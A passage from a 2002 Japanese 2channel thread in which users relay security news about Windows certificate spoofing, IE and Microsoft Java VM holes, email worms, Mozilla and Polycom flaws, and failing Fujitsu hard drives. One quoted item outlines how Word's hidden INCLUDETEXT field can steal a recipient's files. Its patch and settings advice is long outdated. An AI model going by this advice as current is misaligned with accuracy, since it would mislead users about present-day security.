下位証明書を証明していると見せかけられる可能性があります。
(続く)
483 :
むむむ ◆MUMUMU4w :02/09/06 00:09 ID:phlEuKkC
484 :
むむむ ◆MUMUMU4w :02/09/06 00:10 ID:phlEuKkC
>>483 (続き)
以下の製品に関する修正プログラムは現在準備中です。公開され次第、
このページでご案内します。
・Microsoft Windows 98/98 Second Edition
・Microsoft Windows Millennium Edition
・Microsoft Windows 2000
・Microsoft Office v.X for Mac
・Microsoft Office 2001 for Mac
・Microsoft Office 98 for the Macintosh
・Microsoft Internet Explorer for Mac (for OS 8.1 to 9.x)
・Microsoft Internet Explorer for Mac (for OS X)
・Microsoft Outlook Express 5.0.5 for Mac
(以上)
485 :
むむむ ◆MUMUMU4w :02/09/06 00:12 ID:phlEuKkC
>>484 ということで「危険度大」のセキュリティホールの模様。
現時点では NT4.0 と XP のパッチのみが公開。その他はまだ準備中。
なお、MS Office for Macintosh, IE for Macintosh, Outlook Express for Macintosh も
同様のセキュリティホールを持つとのこと(こちらも、パッチは準備中)。
486 :
むむむ ◆MUMUMU4w :02/09/06 01:39 ID:phlEuKkC
487 :
むむむ ◆MUMUMU4w :02/09/06 01:52 ID:phlEuKkC
488 :
むむむ ◆MUMUMU4w :02/09/06 02:10 ID:phlEuKkC
>>486 日経 IT Pro の記事。こっちの方が、よりきちんと説明されています。
◆Windows OSなどになりすましを許すホールが発覚,危険度は「高」
マイクロソフトは9月5日,なりすましを許すセキュリティ・ホールがすべてのWin
dows OSにあることを明らかにした。偽造されたデジタル証明書を適切にチェックで
きないため,S/MIMEを使った偽の署名メールを受信したり,SSLを使用する偽のWebサ
イトへアクセスしたりした場合でも,Windows上のアプリケーションは警告を出さな
い。IE for Mac,Office for Mac,Outlook Express for Mac にも同様のセキュリテ
ィ・ホールがある。最大深刻度は「高」。対策はパッチを適用することである。
引用元:
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20020905/2/
>むむむさん 最近、ニュー+の出番が少ないと思ったら、 こっちで精出してたんですね。
>>489 どうも。単に出張中だったためです、、、。
N+の場合、
・全部のスレに目を通す(既出を避けるため)
・ネタをチェックする
・依頼スレをチェックする
・ネタの関連リンクや情報を吟味する
・既出を3つぐらいの別キーワードで検索してチェックする
とかいう感じで手間がかかるので、さすがに出張中は少しスレ立て数が減りますね。
その点こっちは、既出とか心配しなくていいですし、
情報は「とりあえず」出せばいいので。
491 :
むむむ ◆MUMUMU4w :02/09/06 11:52 ID:5IQSBABW
492 :
よーわからんが :02/09/06 18:38 ID:Q0kq6nde
Q328145ぶち込んだらなーんかいろんなデジタル証明が無効になりますた・・・・・ これかなり深刻だと思いまつでつ
493 :
むむむ ◆MUMUMU4w :02/09/06 20:15 ID:5IQSBABW
■Windows 2000サーバに対する攻撃が頻発している件について、米Microsoftが
調査結果を報告
Windows 2000サーバを狙った一連の“謎”のハッキングに、Microsoftが困惑している。
ワームによるものではないと同社は判断したようだが、詳細は不明
Windows 2000サーバに対する攻撃が頻発している件について、米Microsoftが
調査結果を報告した。同社の調査チームは、この事件に困惑している。
同社は8月30日に発行したアドバイザリで、最近複数の企業から「ハッキング活動が
増加している」という報告があったとして顧客に警告。同社のプロダクトサポートサービス
部門(PSS)は、システム管理者に対し、トロイの木馬(正当なプログラムを装った悪質
コード)や、ネットワークの特定の奇妙な動作に気を付けるよう呼びかけた。
(以上、2002年9月6日のZDNet JAPANより一部引用―全文は引用元を参照)
引用元:
http://www.zdnet.co.jp/news/0209/06/ne00_attack.html
494 :
むむむ ◆MUMUMU4w :02/09/06 20:16 ID:5IQSBABW
■オサマ・ビンラディン氏のメッセージを送信するNedalウイルス(2002.9.6)
◆概要:
Nedalは新しく発見されたVisual Basicウイルスで、テロリズムとオサマビンラデン氏に
関するメッセージを送信する。Nedalのサイズは40,960バイトで、通常、電子メール、ネット
ワーク、リムーバブルメディア、インターネットリレーチャット、その他のファイル共有媒体
を介して他のコンピューターに拡散する。
Nedalを実行するとWindowsディレクトリーにある.exeファイルに感染しようと試みる。
次に、.wtc拡張子の付いたファイルを作成して実行する。その後Win.iniが作成されるが、
このファイルには次のようなテキストが含まれている。
(以下略)
(以上、2002年9月6日のNetSecurityより一部引用―全文は引用元を参照)
引用元:
https://www.netsecurity.ne.jp/article/2/6558.html
495 :
名無しさん@お腹いっぱい。 :02/09/06 21:48 ID:eql5xrKP
>>485 >
>>484 > ということで「危険度大」のセキュリティホールの模様。
> 現時点では NT4.0 と XP のパッチのみが公開。その他はまだ準備中。
Win2k以外は出ました。
496 :
むむむ ◆MUMUMU4w :02/09/07 00:08 ID:YAL4xK/k
なんで、Windows 2000のはまだ出ないんでしょうね?
>>497 SP3が出たばっかりだからじゃないでしょうか?
499 :
名無しさん@お腹いっぱい。 :02/09/07 03:33 ID:nHL+8tps
デジタル証明書のやつ、XPHomeで何回WUdにアクセスしても 「重要な更新なし」ってなるよヽ(`Д´)ノウワァァァァァァン!! だいじょぶなん?
500 :
499 :02/09/07 03:48 ID:DrKIMXsx
しょーがないんで
>>496 のリンク先で手動でダウソしますた。
WUdにはまだ登録されてないの?
いつもの事だが、
>>496 にOperaでアクセスしたらまともに表示されない。
502 :
名無しさん@お腹いっぱい。 :02/09/07 03:54 ID:DrKIMXsx
ID(・∀・)イイ!
>>501 OperaのCSSやJavaScript、DOMの実装がおかしいだけ。
>>503 ちがう
src属性があるのに中身が空っぽの変な記述をしているのが問題
<SCRIPT LANGUAGE="javascript" SRC=""></SCRIPT>
505 :
501 :02/09/08 01:31 ID:???
>>503-504 どっちなのかは分からんが、取り敢えず、JavaScript を切っていた時点で
失格だったのは分かった。有り難う。
506 :
むむむ ◆MUMUMU4w :02/09/08 22:28 ID:Jy59bb6j
507 :
むむむ ◆MUMUMU4w :02/09/09 15:19 ID:4ahFhKJe
508 :
むむむ ◆MUMUMU4w :02/09/09 15:32 ID:4ahFhKJe
>>509 現地のネットワークがきびしいので、N+での記者活動はできないかも。
ここに書くぐらいは何とか。
511 :
むむむ ◆MUMUMU4w :02/09/09 23:03 ID:4ahFhKJe
■Cドライブを初期化するワーム「ハンチ」で警告 シマンテック
アンチ・ウイルスソフトのシマンテックはこのほど、大量メール送信ワーム「ハンチ」の
亜種、「W32.Hunch.H@mm」と「W32.Hunch.I@mm」について警告を出した。感染報告例は
ほとんどないが、Cドライブをフォーマットしようとするため「ダメージが大きくウイルス
ソフトを利用していない場合は危険」としている。
同ウイルスは、ともに9月5日 (米国時間)に発見された。いずれも、添付ファイルを
開封すると感染し、Outlookのアドレス帳に登録されている全メールアドレス宛に自分
自身を送信する。また、無作為に選び出した拡張子のファイルを削除する。影響を受ける
システムはWindows95、98、NT、2000、XP、Meだが、95、98、Meでは次回起動時に
ハードドライブが再フォーマットされてしまう。
メール件名はランダムで、添付ファイル名も変化する。
(以上、2002年9月9日の毎日インタラクティブより一部引用―全文は引用元を参照)
引用元:
http://www.mainichi.co.jp/digital/network/archive/200209/09/7.html
512 :
名無しさん@お腹いっぱい。 :02/09/10 02:38 ID:xsWwDseB
突然すみません。 当方、ヤフーBBなんですけど、 自スレで友達とマターリと話してたら、なんかまったく同じIPの騙りが出てきたんですけど、 こんなことって出来るの?? 変なこと騙られないか心配で寝れません。 YBBにメルしたほうがいいのでしょうか?
>>512 IP が一致するのは非常に低い確率だけどあり得る。運が悪いね。
YBB にメールしても何にもならないよ。回線切って寝たほうが早い。
514 :
むむむ ◆MUMUMU4w :02/09/10 13:52 ID:GW9aAo7O
515 :
☆☆あっ激写シリーズ☆☆ :02/09/10 13:53 ID:ilg1XtW9
517 :
名無しさん@お腹いっぱい。 :02/09/10 14:12 ID:rpT0wdCZ
広告はあぼ〜んして。 広告がウザいのには同意だが いた違いの雑談はできるだけやめてほしい。 いつもお疲れ。
518 :
むむむ ◆MUMUMU4w :02/09/10 16:16 ID:GW9aAo7O
■IE に新たな脆弱性、イスラエル企業が警告(2002/9/10)
イスラエルのセキュリティ会社 GreyMagic Software は9日、Microsoft (NASDAQ:
MSFT) の Web ブラウザ『Internet Explorer (IE)』に新たな脆弱性が見つかったと
発表した。Web サイトのフレームを通じて攻撃者にパソコンを改竄 (かいざん) され
かねない脆弱性だという。
この脆弱性は、『IE 5.5』以降の全バージョン、および IE のエンジンを使っている
アプリケーション ──『Outlook』や『MSN Explorer』など ── の全てに存在する。
この脆弱性を突けば、IE が設定したプロトコルやドメイン制限を一切無視して、
フレームやインラインフレームのエレメントを含んだ任意の Web ページでスクリプトを
実行できる。
スクリプトを実行すれば、任意のサイトのクッキーを盗んだり、ページ上のコンテンツ
を改竄したりできる。そして多くの場合、ローカルファイルを読んだり、クライアントの
マシンで任意のプログラムを実行したりすることも可能だという。
(中略)
Microsoft はまだ修正パッチを公開していないため、GreyMagic はユーザーに対し
Active Scripting を無効にするよう呼びかけている。それを無効にすれば、問題の
脆弱性を突かれることはない。
(以上、2002年9月10日のjapan.internet.comより一部引用―全文は引用元を参照)
引用元:
http://japan.internet.com/webtech/20020910/10.html GrayMagicの情報&デモ:
http://sec.greymagic.com/adv/gm010-ie/
519 :
通行人 :02/09/10 17:41 ID:???
>>512 当方ヤフーでないので、今の状態分からないけど
私の場合 ケーブルで、そこのプロキシーサーバーを設定して
利用してここに来るので、たまに同じIDの人に遭遇する
(当然同じ プロキシー使って 繋げたら IDは同じに
なります)
*ID同じのを見つけると、なんか驚かしたくなるのかと
思って あんまし気にしてませんが、、、、
520 :
むむむ ◆MUMUMU4w :02/09/10 21:21 ID:LfrEsPfB
521 :
むむむ ◆MUMUMU4w :02/09/10 21:56 ID:GW9aAo7O
■IEのJava環境に10種類以上のセキュリティホール、IE6 SP1では未対応
Microsoftの「Internet Explorer(IE)」に付随するMicrosoft製のJava環境に複数の
深刻なセキュリティーホールが発見された。このセキュリティーホールを発見した
のはフィンランドのOnline Solutions社で、Microsoftはこの問題を認め、現在パッチを
準備している最中だという。9日にMicrosoftより発表された「Internet Explorer 6 SP1」
では、未対応の問題である。
このセキュリティーホールが悪用されると、IEでWebページを開いた場合、あるいは
Outlookでメールを通してWebサイトで閲覧した場合に、そのページに含まれる悪意の
Javaアプレットを通して任意のプログラムが実行される可能性がある。Outlookと
Outlook Expressの場合、最新のパッチを当てていればセキュリティーゾーンが最高に
設定されているためJavaアプレットは実行されない。
今回Online Solutionsは、10種類以上のJavaにまつわるセキュリティーホールを
発見し、そのすべてをMicrosoftに対して報告した。その中にはユーザーのシステムの
ファイルを閲覧できるようにするもの、リソースにアクセスできるもの、任意のプログラム
を送り込んで実行させるものなどがあった。こうしたセキュリティーホールは悪用する
ことにより、ファイルを改変したり危険なプログラムをインストールし実行すること、
プログラムの削除などができてしまうという。
(以上、2002年9月10日のInternet Watchより一部引用―全文は引用元を参照)
引用元:
http://www.watch.impress.co.jp/internet/www/article/2002/0910/mjvm.htm どうやら
>>518 と別みたいなので、本日だけで2本目のセキュリティホール報告。
>>521 IEのというか、IEに限らないので「MSの」ですね。スマソ。
>>521-522 引用元によると、問題は MS が「独自拡張」した部分のため、
Sun のJava VM (Java plug-in)を使えば問題ない模様。
524 :
むむむ ◆MUMUMU4w :02/09/11 13:18 ID:cPxjJyb8
IEのセキュリティーホールが見つかる(よくあること)のは怖いけど 対策とってるから少しはまし Opera使うことあるけど正しく表示されないこと多々 とりあえずMicrosoftのHPいってアップデートしとけば安心。たぶん
527 :
名無しさん@お腹いっぱい。 :02/09/11 18:37 ID:SK4owMaj
528 :
むむむ ◆MUMUMU4w :02/09/11 20:23 ID:f6IoYR5j
529 :
むむむ ◆MUMUMU4w :02/09/12 22:30 ID:BqPwcTxb
■WORM_CHET.A (チェット)〜9.11同時多発テロに便乗したウイルス〜
米国同時多発テロから1年が経った2002年9月11日、テロに便乗したウイルスが
発見されました。
WORM_CHET.A(チェット)は、メールの添付ファイルで広まるウイルスで、メー
ルにはテロの内容が記述されています。内容は下記の通りです。
送信者:
[email protected] タイトル: All people!!
添付ファイル名: 11september.exe (exeの後ろにスペースが入ってます)
本文:Message Body: Dear ladies and gentlemen! で始まる英文で、テロに
関する内容が記されています。
添付ファイルを実行すると感染し、上記内容のウイルス付きメールを任意の宛
先に送信します。ただし、ウイルスコードの中にいくつかのバグがあるため、
メール送信が行われない場合もあります。
現在のところ実際の感染報告はなく危険度は低いものですが、今後も同様に大
きな社会的現象に便乗したウイルスが出現するおそれがありますのでご注意く
ださい。
トレンドマイクロ製品ではパターンファイル347以降で本ウイルスに対応して
います。
○ WORM_CHET.A 詳細情報:
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_CHET.A
530 :
bloom :02/09/12 22:32 ID:uKsnkdkr
531 :
むむむ ◆MUMUMU4w :02/09/12 22:54 ID:BqPwcTxb
※※※ 注意!!! 富士通製HDDは危険な可能性があります ※※※
現在、富士通製HDD MPG3409シリーズのクラッシュが異常な頻度で発生しているとの情報があります。
この件に関して富士通側からの公式コメントはありません。
以下はあくまで『経験にもとづく』『ネット上での』情報です
・HDD裏面の制御チップがCIRRUS LOGIC製で稼動中に異常発熱する
・型番はCL-SH8671-450E-A4など、型番の末尾が、A[n]で、nが6以下のものが危険性が高い模様。
それに加えて、製造年月が、2001-3以前のものなら、ほぼ確実に該当ロット。
・富士通は、HDDを単体で購入したユーザーに対して対応するつもりは全く無い模様
[具体例]
MADE IN THAILAND
MODEL MPG3409AT-EF
DATE 2001-5
チップ
CIRRUS LOGIC
CL-SH8671-450E-A4
F010851-1219AH
0109 l
KOREA-F
富士通製PCだけでなく、日立・IBM・NEC・コンパック等のメーカー製PCにも使用されています
事実を知らず、つい格安HDDとして購入された方もいらっしゃるようです。
詳細は自作PC@2ch掲示板
ttp://pc3.2ch.net/jisaku/ の関連スレへ。
現状ではクラッシュ後のデータ復活は まず不可能です
大 至 急 デ ー タ の バ ッ ク ア ッ プ を し て く だ さ い
533 :
むむむ ◆MUMUMU4w :02/09/13 00:27 ID:2plB1sLs
※※※ 注意!!! 富士通製HDDは糞ヽ(`Д´;)ノ ※※※
http://www.nhk.or.jp/news/2002/09/13/k20020913000034.html# http://headlines.yahoo.co.jp/hl?a=20020913-00000404-yom-bus_all 現在、富士通製HDD MPG3409シリーズのクラッシュが『2〜3%』どころじゃない異常な頻度で発生しているとの情報があります。
この件に関して富士通側からの公式謝罪はありません(1年以上前から分かってたのに。) 企業体質を疑うね。
以下はあくまで『経験にもとづく』『ネット上での』情報+αです
・HDD裏面の制御チップがCIRRUS LOGIC製で稼動中に異常発熱するので、HDD自体のせいで「高音多湿」に(藁
・型番はCL-SH8671-450E-A4など、型番の末尾が、A[n]で、nが6以下のものが危険性が高い模様。
それに加えて、製造年月が、2001-3以前のものなら、ほぼ確実に該当ロット。
・富士通はバルクユーザーに対して対応するつもりは全く無い模様
[具体例]
MADE IN THAILAND
MODEL MPG3409AT-EF
DATE 2001-5
チップ
CIRRUS LOGIC
CL-SH8671-450E-A4
F010851-1219AH
0109 l
KOREA-F
富士通製PCだけでなく、日立・IBM・NEC・コンパック等のメーカー製PCにも使用されています
事実を知らず、つい格安HDDとして購入された方もいらっしゃるようです。つーか、秋葉でまだ売ってるよ……
詳細は自作PC@2ch掲示板
ttp://pc3.2ch.net/jisaku/ の関連スレへ。
現状ではクラッシュ後のデータ復活は まず不可能です。まぁ今後の腐士通の熱意次第ですけど。
大 至 急 デ ー タ の バ ッ ク ア ッ プ を し て く だ さ い
>>534 自作派で富士通なんか買ってる奴の方が悪い
バルクが対応されないおは当然だと思うが?
>>535 不良品と知ってて売り続ける店も店だわ。
ジャンク品売り場にあるなら疑いもするけどな。
>>535 基本的にHDDは組込みされてる物以外はバルクですが何か?(外付け除く)
すっげー前から言われてたことなのに、どうして組む前に調べないかね? バルクに救済措置が取られると考えるのもどうかしてるし。
539 :
_ :02/09/13 23:02 ID:???
おまけにセキュリティ違いという話も・・
540 :
名無しさん@お腹いっぱい。 :02/09/14 01:34 ID:YseC7hUO
unnko
541 :
むむむ ◆MUMUMU4w :02/09/14 14:32 ID:JhY1OfEn
>>541 落とそうとしている最中だが。
130Mbyte!?
543 :
542 :02/09/14 15:41 ID:???
インスト完了。 システムのプロパティに Service Pack 1 の文字が。
544 :
542 :02/09/14 15:54 ID:???
ちなみに、インストールフォルダに 280Mbyte 程、アンインストール用の バックアップフォルダに 250Mbyte 程の空き容量が必要。
545 :
名無しさん@お腹いっぱい。 :02/09/14 15:55 ID:q/SWSswP
56kbpsで落とせるかゴルァ! いいもん、CD買うから。 …CATVがくるまで待ちか。。。
546 :
542 :02/09/14 16:01 ID:???
547 :
名無しさん@お腹いっぱい。 :02/09/14 16:27 ID:+0ITbZzE
おお、とうとう来ましたか。これってプラス板に立ててもいいんではないかなんて 思うんですがどうなんだろ。
548 :
むむむ ◆MUMUMU4w :02/09/14 16:45 ID:JhY1OfEn
>>546 SP1インストール後にAd-aware 5.83+Refupdate 2.01でスキャンしましたが、
いつも出る2つ(Other と Doubleclick)以外は特に出なかったです。
>>547 ふむ、どうしましょうか。
549 :
むむむ ◆MUMUMU4w :02/09/14 17:28 ID:JhY1OfEn
今頃知った、、、。これって仕様だと思ってたけど、バグだったのね。
SP1にこのパッチは含まれている模様。セキュリティ情報じゃなくて失礼。
■Windows XP 修正プログラム : SMB を使用してファイルを開く時に時間がかかる
この修正プログラムでは、SMB プロトコルを使用しているネットワーク共有を経由して
ファイルを開こうとすると、ファイルが開くまでに長時間かかってしまう問題が修正され
ます。この問題は、Windows XP クライアントが既にファイルを開いており、そのファイルに
対する oplock (opportunistic file locking) を保持している場合に発生することがあります。
詳細 -
http://www.microsoft.com/japan/support/kb/articles/JP309/3/76.asp バージョン - Q309376
リリース日 - 29 May 2002
推定ダウンロード サイズ/時間 @28.8 - 285 kb / 2分
550 :
542 :02/09/14 21:04 ID:???
551 :
名無しさん@お腹いっぱい。 :02/09/15 09:33 ID:PdnUiZTU
なんかM$のあぷでーとから落としても インスコに失敗しますた になるよー、ウワァァァァン。 XP-56kbps。 あと自動更新でダウソしても現在の状況とか見れないの?
552 :
むむむ ◆MUMUMU4w :02/09/17 12:28 ID:LMInmwgR
■MS Wordに文書のハイジャックを許す問題点
米Microsoftは9月12日、同社のワープロソフト「Word」に、外部からのファイルの
盗み取りを許す問題点があると明らかにした。
ただしこの手法を悪用する攻撃者は、対象ファイルの所在と名称を正確につかんで
いる必要があり、また被害者にWord文書をオープン/修正/セーブさせ、送信者に
返送させなければならない。
(中略)
攻撃者はWord文書に組み込まれている数々の隠しフィールドの1つである
「INCLUDETEXT」を利用することにより、別のコンピュータ上でオープンされた文書に
テキストをコピーすることができる。小さな書体を使い、文字色を白にすることで、
この追加テキストはほとんど目視不可能になり、ファイルを隠すことができる。
この問題点はBugtraqメーリングリストで8月26日に最初に報告された。Woody's
Office Watchの編集者でWindows利用者のための書籍をいくつか著しているWoody
Leonhard氏が、自身のメールニュースレターでこの問題を取り上げている。
Microsoftは現在調査を進めているが、修正プログラムのリリーススケジュールは
示しておらず、現状では、ファイルが盗まれるのを防ぐためには、手作業でフィールドを
チェックする必要がある。
(以上、2002年9月17日のZDNet JAPANより一部引用―全文は引用元を参照)
引用元:
http://www.zdnet.co.jp/news/0209/14/nebt_08.html
553 :
むむむ ◆MUMUMU4w :02/09/17 12:39 ID:LMInmwgR
554 :
名無しさん@お腹いっぱい。 :02/09/17 13:31 ID:FvE7NdUz
555 :
むむむ ◆MUMUMU4w :02/09/17 16:11 ID:LMInmwgR
■Mozilla にプライバシー情報を露呈する脆弱性
Mozilla ベースのブラウザを使うと、ユーザーの Web サーフィン活動が漏えいする
可能性があることが、研究者の報告で明らかになった。
Neopoly の主任研究員 Sven Neuhaus 氏によると、このバグは5月に初めて発見
されたもので、深刻なプライバシー問題を引き起こすという。
Neuhaus 氏の報告によると、Mozilla ベースのブラウザのユーザーが、『JavaScript』
の『onunload』あるいは『unload』ハンドラを悪用する Web サイトを訪問すると、その
直後あるいは一定時間後に訪問する URL をそのサイトに知られてしまうという。
このため、ユーザーは移動先の URL を手動で打ち込んだにしろ、ブックマークで
指定したにしろ、Web サイト側から追跡されてしまうことになる。
Neuhaus 氏は、Mozilla の各リリースの脆弱性情報を追跡するサイト Bugzilla で
「このバグは Mozilla 1.1 リリースに依然として含まれている……すでに3カ月もの間
放置されている」と述べて修正の必要性を訴えた。
脆弱性が存在するのは、Mozilla 0.9x、1.0、1.0.1、1.1および1.2 alpha 版、
Netscape 6.x および7、ならびに Galeon 1.2.x および Chimera 0.5となっている。
Mozilla のユーザーには、修正プログラムの準備が整うまでの応急措置として、
JavaScript を無効にするよう勧告が出ている。
(以上、2002年9月17日のjapan.internet.comより一部引用―全文は引用元を参照)
引用元:
http://japan.internet.com/webtech/20020917/11.html
556 :
むむむ ◆MUMUMU4w :02/09/17 16:13 ID:LMInmwgR
>>555 本文中にもあるように、これは
>脆弱性が存在するのは、Mozilla 0.9x、1.0、1.0.1、1.1および1.2 alpha 版、
>Netscape 6.x および7、ならびに Galeon 1.2.x および Chimera 0.5となっている
ということで、MozillaだけではなくMozillaベースのブラウザに広範囲に影響する模様。
557 :
むむむ ◆MUMUMU4w :02/09/17 18:13 ID:LMInmwgR
>>475 ポリコムのセキュリティホール、日本語ソースがようやく出ました。
2 ■ポリコム社のテレビ会議システムにセキュリティーホール ■
<
http://www.hotwired.co.jp/news/news/20020917302.html >
米ポリコム社のテレビ会議システム『ビューステーション』
(ViewStation)にセキュリティーホールが存在することが発覚した。
外部からシステムをコントロールし、企業の社内テレビ会議をイン
ターネット上で放映することも可能だという。同社は先週、修正
を施したアップグレード版をリリースしているが、ユーザーへの
通知が徹底しておらず、対応に不満の声が上がっている。
[Technology]
以上、WIRED NEWS より。
558 :
名無しさん@お腹いっぱい。 :02/09/17 21:49 ID:msjADlZu
559 :
bloom :02/09/17 21:58 ID:GPt5Z04/
560 :
名無しさん@お腹いっぱい。 :02/09/17 22:10 ID:QLVU8mFd
>>558 あれ、疲れる
読ませようと言う気もないみたい(途中で読むの止めたわ)
パスワードがあまりに簡単か、トロイでも仕掛けられてるのやら
561 :
むむむ ◆MUMUMU4w :02/09/19 05:12 ID:13dHFO1k
562 :
むむむ ◆MUMUMU4w :02/09/19 05:14 ID:13dHFO1k
563 :
b :02/09/19 05:33 ID:3nzDo92a
何でこのスレは Windows 板にないのさ?
ぼぶ ◆EMrmvKLI [] 投稿日:02/09/10 19:18 ID:G4zqfa38 これはいろんなとこにコピペしてください。 みんなで台風を起こしましょう。 東京駅を中心に右回りです。 9月22日夜9時にみんなでいっせいに「フゥー」と吹くのです。 注意 周りに障害物のないところでやりましょう(なるべく高いところ) 「フゥー」以外に扇風機やうちわを使ってもかまいません。 !東京を壊しましょう!
>>564 いよいよ「表向きにも」配布始まりましたか。
>>565 とりあえず「速報」という趣旨でここに立てたです。
568 :
むむむ ◆MUMUMU4w :02/09/19 11:37 ID:YPaVnxFQ
569 :
名無しさん@お腹いっぱい。 :02/09/19 13:28 ID:woq2ngZ5
>>569 こっちも出ましたね。なお、WinXPをSP1にするとIEもSP1になる模様。
571 :
むむむ ◆MUMUMU4w :02/09/19 15:16 ID:UO2J2exJ
■Windows2000/XPにリモートからの攻撃が可能なセキュリティホール、情報の漏洩も(MS02-051)
最新情報は以下のサイトでご確認ください。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-051ov.asp MS02-051 に関する情報
「MS02-051: RDP プロトコルの暗号の問題により、
情報が漏えいされる (Q324380)」に関する要約情報です。
セキュリティ情報の概要と修正プログラムの情報をご案内いたします。
概要
====
この問題は、下記対象となる製品の RDP に関する脆弱性により、
悪意のあるユーザーにサービスの停止や情報の取得を行われる
可能性があります。
対象となる製品
==============
・ Microsoft Windows 2000
・ Microsoft Windows XP
(続く)
572 :
むむむ ◆MUMUMU4w :02/09/19 15:16 ID:UO2J2exJ
573 :
むむむ ◆MUMUMU4w :02/09/19 15:18 ID:UO2J2exJ
■Microsoft Java VMにこれまでとは別のセキュリティホール(MS02-052)
最新情報は以下のサイトでご確認ください。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-052ov.asp MS02-052 に関する情報
「MS02-052: Microsoft VM JDBC クラスの問題により、コードが実行される
(Q329077)」 に関する要約情報です。
セキュリティ情報の概要と修正プログラムの情報をご案内いたします。
概要
====
この問題は、下記対象となる製品の JDBC/ODBC クラスに関する 3 つの脆弱性
により、不正なプログラムが実行される可能性がある問題です。最悪の場合、
悪意のあるユーザーによりお客様のコンピュータ上で任意のプログラムを実行
される可能性があります。
対象となる製品
==============
・Microsoft Virtual Machine for Internet Explorer (Microsoft VM)
ビルド 3805 を含む、それ以前のビルド全て
注意: Microsoft VM は Windows や Internet Explorer の一部として出荷
されているほかに、Windows Update や Web サイトから新しいバージョンを
ダウンロードすることもできます。また、Microsoft VM は多くの
アプリケーションの一部としても出荷されています。そのため、必ずビルド
番号を確認してください。
(続く)
574 :
むむむ ◆MUMUMU4w :02/09/19 15:19 ID:UO2J2exJ
>>573 続き
Microsoft VM の ビルド番号の確認方法は、以下の2つの方法があります。
・JVIEW コマンドを使用する
1. コマンド プロンプトを起動します。
・Windows 98/98SE/Me
[スタート] - [ファイル名を指定して実行]を選択し、 command と入力し [OK]
をクリックします。
・Windows NT/2000/XP
[スタート] - [ファイル名を指定して実行]を選択し、 cmd と入力し[OK]を
クリックします。
2. jview を実行します。
3. 実行すると、Version が表示されます。
・MSJAVA.DLL ファイルのバージョンから Microsoft VM のバージョンを
確認する
Internet Explorer 4.01 SP1 の環境においては、JVIEW コマンドを使用して
確認したバージョン情報と MSJAVA.DLL のバージョンが異なります。正しい
Microsoft VM のバージョンは、MSJAVA.DLL のバージョンです。
1. [スタート] ボタンをクリックし、[検索] - [ファイルやフォルダ] を
クリックします。
2. [名前] ボックスに MSJAVA.DLL と入力し、[探す場所] ボックスで OS が
インストールされているドライブを指定して、[検索開始] ボタンを押します。
3. 検索結果として表示された MSJAVA.DLL ファイルをマウスの右ボタンで
クリックし、表示されたメニューから [プロパティ] をクリックします。
4. [バージョン情報] のタブを開き、ファイル バージョンを確認します。
ファイル バージョンの数字の最後の 4 桁が、Microsoft VM の
ビルド番号です。
(続く)
575 :
むむむ ◆MUMUMU4w :02/09/19 15:19 ID:UO2J2exJ
>>574 続き
修正プログラム
==============
この問題に対する修正プログラムは Windows Update からインストール
してください。
・Windows Update
http://windowsupdate.microsoft.com 注意:上記の修正プログラムをインストールするためには Microsoft VM
(ビルド 3805) がインストールされている必要があります。Microsoft VM
(ビルド 3805) は Windows Update の「重要な更新と Service Pack」 の
「セキュリティ問題の修正プログラム - 2002 年 3月 4 日 -
(投稿した日付: July 10, 2002)」 を選択しインストールしてください。
Windows XP をお使いのお客様は、Windows Update カタログ からの入手、
または、Service Pack 1 をインストールすることによって、Microsoft VM
(ビルド 3805) を適用することができます。
Windows Update の使い方については、次のサイトを参照ください。
http://www.microsoft.com/japan/security/square/guard/a04g1.asp
576 :
むむむ ◆MUMUMU4w :02/09/19 15:20 ID:UO2J2exJ
補足。
>>575 には WinXP SP1 を入れれば問題ない、という記述がありますが、
今 Windows Update したところ「入れなさい」と表示されました。
>>576 というかよく読むと「(WinXP SP1にすることで)ビルド3805にしてから、Windows Update
しなさい」ということか。ううむ。
>>577 いつもご苦労様です。m(_ _)m
これからもよろしくお願いします。
今回の MS02-052 はどうやら
>>521 の修正みたいですが、全部が解決したのかは
まだ明らかではない模様。
>>578 どうも。今日は超忙しくてN+の方のスレ立ては無理ぽなので、
ここだけしかメンテできそうもない、、、。
そもそもMicrosoft VMを使うべきじゃないんじゃないですかねぇ・・・
>>580 でもタブブラウザ使ってるとSunのJAVA使えなくない?
>>581 そうですね。IEエンジンのタブブラウザ(例えばSleipnir)とかでは
デフォルトではSunのJava plug-inは使われないようです。
Java plug-inを入れた状態で例えばここ↓のページ見て、タスクトレイに
例のコーヒーカップが表示されない場合、Sunのプラグインは使われていません。
584 :
むむむ ◆MUMUMU4w :02/09/19 20:50 ID:UO2J2exJ
>>583 ていうか、OperaではSunのが動いてもコーヒーカップは表示されないので、
あまり正確ではないですね。
とりあえず、このURLの時計を見たときに、文字盤の数字が太めのゴシックっぽい
字で表示されるのがSunのが動いたときで、細めの字が表示された時はMSの
もののようです。
(Windows XP SP1の場合)
あと、アプレットのロードに時間がかかって、すぐに表示されない方がSunのだと
いう話もあります(w。
586 :
名無しさん@お腹いっぱい。 :02/09/19 22:59 ID:yJmbx4ZX
WinMEでMS02-052入れたら再起動しますかと聞かれ はいを押したらブルースクリーンになってしまった。前にもこんなことがあった気が。インストールはされたようだが。
>>581-585 他スレでも書いたがもう一度書いておくと、
Javaの起動が遅かったりタスクトレイにコーヒーカップアイコンが
出たりするのが嫌な場合、コントロール パネルのJava Plug-inを開き、
基本タブで「コンソールを開始しない」に設定すればまとめて改善される。
(ただし、SunのJavaのバージョンが1.4.0以降で有効。)
遅いのはコンソール起動に時間がかかっているから。
起動しなくてもJavaは動くし、タスクトレイアイコンはコンソールの
機能なのでコンソールを開始しなければ出ない。
(「Java アイコンをシステムトレイに表示」のチェックは
コンソールを開始した際の設定なので、上の設定をした場合は
チェックはそのままでも構わない。)
IEとそのコンポーネント利用系ブラウザでSunのJavaを使うには、
インターネット オプションの詳細設定タブでMicrosoft VMのチェックを
全部外し、その上にあるJava (Sun)の項目をチェックすれば良いと思う。
>>587 > インターネット オプションの詳細設定タブでMicrosoft VMのチェックを
> 全部外し、その上にあるJava (Sun)の項目をチェックすれば良いと思う。
いや。IEコンポ系(当方プニル)の場合、この通りやってもSun Javaは
起動しないんだ。IE本体ならちゃんと起動するんだけどね。
589 :
587 :02/09/20 06:45 ID:???
>>588 私の勘違いだったみたい…ごめんなさい。
確かにコンポーネントブラウザだと駄目みたい(当方Moon。)。
>>587 の訂正。申し訳ない…。
